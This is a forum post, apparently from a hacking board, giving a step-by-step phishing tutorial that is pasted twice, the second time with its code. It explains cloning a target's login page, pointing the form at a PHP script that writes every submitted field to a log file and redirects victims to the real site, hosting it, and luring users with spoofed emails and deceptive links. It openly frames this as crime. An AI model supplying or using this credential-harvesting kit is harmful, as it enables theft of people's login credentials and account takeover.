Man
Professional
- Messages
- 3,077
- Reaction score
- 614
- Points
- 113
REAL VILLAIN TIME
Phishing involves tricking someone into clicking on a link that leads to a counterfeit login page, which you have created. The aim is to deceive them into submitting their login credentials. Below is a fundamental outline of how this process is typically executed.
1. Decide who / where you would like to get into
Select a target and familiarize yourself with the login or form process. Understand where users are redirected when they enter incorrect details, and determine if the error page can be accessed directly through a permanent link (permalink). Following this, the next step involves creating a replica of the page.
2. Save the source locally as a HTML file (e.g. login.html)
To effectively replicate the page, you'll need to acquire most, if not all, of the files it loads, such as images and CSS files. Typically, you can do this by using the Save shortcut (Ctrl + S), which should prompt a popup that allows you to save the content on your local machine. Ensure that you select the "Webpage, Complete" option and choose a folder for saving.
In cases where this saving method isn't available, an alternative is to right-click on the page, select "View Source," and then copy the source code into a text editor. You'll also need to manually save any images or stylesheets to their correct relative paths. Alternatively, consider using web scraper software for this task. If executed properly, your saved page should mirror the live version without any missing or broken images.
The next step involves modifying the form action in your copied page. This typically appears in a format similar to the following:
Change "/login" to be the name of the file used to save data as mentioned in the next section (e.g. "save.php").
3. Make a server side script to save data entered into the form
In the example below PHP is used. Copy the following code into a text editor and save the file as "save.php".
If the form error page can be linked to directly change the "innocentlink" to go to this page, otherwise change the log to be the external location of the form. The code above simply saves all POST data to a log file but a database could be used instead.
4. Find a webhost that supports PHP
Numerous free PHP web hosting services are available, but it's crucial to choose one that doesn't display ads on the page. Once you've selected a host, upload all the files and then open the page in a web browser. If everything is done correctly, it should be indistinguishable from the authentic page. Test it by entering any data into the form and then check the log file. The data you entered should now be recorded there.
The final step is to persuade users to visit your link and input their data. This can be accomplished by mimicking an email from a reputable company or by embedding your link within anchor text (for example, using <a href="http://maliciouslink.com">http://innocentlink.com</a>). The method you choose for this depends on your strategy.
THIS HAS BEEN PSY0P AND REMEMBER; GIVE A MAN A PHISH, AND HE'LL CRIME FOR A NIGHT. TEACH A MAN TO PHISH AND HE'LL CRIME FOR THE REST OF HIS LIFE
Phishing involves tricking someone into clicking on a link that leads to a counterfeit login page, which you have created. The aim is to deceive them into submitting their login credentials. Below is a fundamental outline of how this process is typically executed.
1. Decide who / where you would like to get into
Select a target and familiarize yourself with the login or form process. Understand where users are redirected when they enter incorrect details, and determine if the error page can be accessed directly through a permanent link (permalink). Following this, the next step involves creating a replica of the page.
2. Save the source locally as a HTML file (e.g. login.html)
To effectively replicate the page, you'll need to acquire most, if not all, of the files it loads, such as images and CSS files. Typically, you can do this by using the Save shortcut (Ctrl + S), which should prompt a popup that allows you to save the content on your local machine. Ensure that you select the "Webpage, Complete" option and choose a folder for saving.
In cases where this saving method isn't available, an alternative is to right-click on the page, select "View Source," and then copy the source code into a text editor. You'll also need to manually save any images or stylesheets to their correct relative paths. Alternatively, consider using web scraper software for this task. If executed properly, your saved page should mirror the live version without any missing or broken images.
The next step involves modifying the form action in your copied page. This typically appears in a format similar to the following:
Code:
<form action="/login" method="post">Change "/login" to be the name of the file used to save data as mentioned in the next section (e.g. "save.php").
3. Make a server side script to save data entered into the form
In the example below PHP is used. Copy the following code into a text editor and save the file as "save.php".
PHP:
<?php
$logFile = "data.txt";
$handle = fopen($logFile, "a");
foreach ($_POST as $name => $value) {
fwrite($handle, $name ."=". $value ."\n");
}
fwrite($handle, "\n-----\n");
fclose($handle);
header("Location: http://innocentlink.com/");
exit;
?>If the form error page can be linked to directly change the "innocentlink" to go to this page, otherwise change the log to be the external location of the form. The code above simply saves all POST data to a log file but a database could be used instead.
4. Find a webhost that supports PHP
Numerous free PHP web hosting services are available, but it's crucial to choose one that doesn't display ads on the page. Once you've selected a host, upload all the files and then open the page in a web browser. If everything is done correctly, it should be indistinguishable from the authentic page. Test it by entering any data into the form and then check the log file. The data you entered should now be recorded there.
The final step is to persuade users to visit your link and input their data. This can be accomplished by mimicking an email from a reputable company or by embedding your link within anchor text (for example, using <a href="http://maliciouslink.com">http://innocentlink.com</a>). The method you choose for this depends on your strategy.
THIS HAS BEEN PSY0P AND REMEMBER; GIVE A MAN A PHISH, AND HE'LL CRIME FOR A NIGHT. TEACH A MAN TO PHISH AND HE'LL CRIME FOR THE REST OF HIS LIFE
